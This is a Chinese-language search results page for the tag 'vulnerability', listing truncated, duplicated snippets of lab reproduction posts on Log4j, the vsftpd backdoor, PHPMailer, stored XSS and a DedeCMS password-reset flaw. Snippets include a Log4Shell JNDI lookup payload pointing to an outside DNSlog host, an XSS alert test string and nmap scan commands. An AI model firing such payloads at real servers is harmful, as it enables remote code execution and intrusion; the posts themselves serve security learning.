搜索结果
查询Tags标签: 漏洞,共有 586条记录-
Apache Log4j 远程代码执行漏洞源码级分析
漏洞的前因后果漏洞描述 漏洞评级 影响版本 安全建议本地复现漏洞本地打印 JVM 基础信息 本地获取服务器的打印信息log4j 漏洞源码分析 扩展:JNDI 危害是什么? GitHub 项目 参考链接漏洞的前因后果 2021 年 12 月 9 日,2021 年 11 月 24 日,阿里云安全团队向 Apache 官…
2021/12/14 20:18:52 人评论 次浏览 -
网络渗透测试作业:笑脸漏洞复现
笑脸漏洞复现 工具: 攻击机:kali 192.168.79.128 靶机:Metasplotable2-Linux 192.168.79.131复现过程 打开 kali 终端,执行以下命令:nmap 主机IP/24发现靶机 (192.168.118.131) 打开着 21 端口 输入命令:nmap -sV 靶机IP可以看到靶机的ftp服务的版本信息是vsftpd …
2021/12/14 6:21:49 人评论 次浏览 -
网络渗透测试作业:笑脸漏洞复现
笑脸漏洞复现 工具: 攻击机:kali 192.168.79.128 靶机:Metasplotable2-Linux 192.168.79.131复现过程 打开 kali 终端,执行以下命令:nmap 主机IP/24发现靶机 (192.168.118.131) 打开着 21 端口 输入命令:nmap -sV 靶机IP可以看到靶机的ftp服务的版本信息是vsftpd …
2021/12/14 6:21:49 人评论 次浏览 -
PHPMailer远程命令执行漏洞复现
PHPMailer远程命令执行漏洞复现 漏洞简介: PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。 PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远…
2021/12/13 14:19:13 人评论 次浏览 -
PHPMailer远程命令执行漏洞复现
PHPMailer远程命令执行漏洞复现 漏洞简介: PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。 PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远…
2021/12/13 14:19:13 人评论 次浏览 -
存储型xss
title: “存储型xss” author: “年轻人” date: “june 26th, 2021” 存储型xss xss提交恶意xss数据,存入应用服务器端,用户访问时被触发 而检验是否存在xss可以通过使用xss弹窗检验 <script>alert(1)</script>防止窃取cookie:http-only(js不能传递cooki…
2021/12/13 6:20:57 人评论 次浏览 -
存储型xss
title: “存储型xss” author: “年轻人” date: “june 26th, 2021” 存储型xss xss提交恶意xss数据,存入应用服务器端,用户访问时被触发 而检验是否存在xss可以通过使用xss弹窗检验 <script>alert(1)</script>防止窃取cookie:http-only(js不能传递cooki…
2021/12/13 6:20:57 人评论 次浏览 -
Log4j2远程命令执行复现
Log4j2远程命令执行复现Log4j2远程命令执行复现一、漏洞环境二、漏洞验证三、反弹shell一、漏洞环境 环境是http://vulfocus.fofa.so平台的二、漏洞验证 启动环境后访问 抓包,修改请求为post在数据中的Accept:头插入exp ${jndi:ldap://8hqrxz.dnslog.cn} 成功回显到dnslo…
2021/12/12 23:20:01 人评论 次浏览 -
Log4j2远程命令执行复现
Log4j2远程命令执行复现Log4j2远程命令执行复现一、漏洞环境二、漏洞验证三、反弹shell一、漏洞环境 环境是http://vulfocus.fofa.so平台的二、漏洞验证 启动环境后访问 抓包,修改请求为post在数据中的Accept:头插入exp ${jndi:ldap://8hqrxz.dnslog.cn} 成功回显到dnslo…
2021/12/12 23:20:01 人评论 次浏览 -
织梦复现任务
主题:【复现任务】织梦CMS前台任意用户密码修改漏洞 漏洞概述 1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面…
2021/12/11 23:17:28 人评论 次浏览 -
织梦复现任务
主题:【复现任务】织梦CMS前台任意用户密码修改漏洞 漏洞概述 1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面…
2021/12/11 23:17:28 人评论 次浏览 -
Log4j 漏洞复现
pom.xml 中:<dependencies><!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api --><dependency><groupId>org.apache.logging.log4j</groupId><artifactId>log4j-api</artifactId><version>2.…
2021/12/11 6:19:29 人评论 次浏览 -
Log4j 漏洞复现
pom.xml 中:<dependencies><!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api --><dependency><groupId>org.apache.logging.log4j</groupId><artifactId>log4j-api</artifactId><version>2.…
2021/12/11 6:19:29 人评论 次浏览 -
log4j2漏洞风险临时处理方案
log4j2漏洞 https://zhuanlan.zhihu.com/p/443575682 复现代码 /*** @author xiaobai*/ @RequestMapping("/test") @RestController @Slf4j public class TestController {private static Logger getLoggerName() {return LoggerFactory.getLogger("userMe…
2021/12/11 6:18:11 人评论 次浏览 -
log4j2漏洞风险临时处理方案
log4j2漏洞 https://zhuanlan.zhihu.com/p/443575682 复现代码 /*** @author xiaobai*/ @RequestMapping("/test") @RestController @Slf4j public class TestController {private static Logger getLoggerName() {return LoggerFactory.getLogger("userMe…
2021/12/11 6:18:11 人评论 次浏览
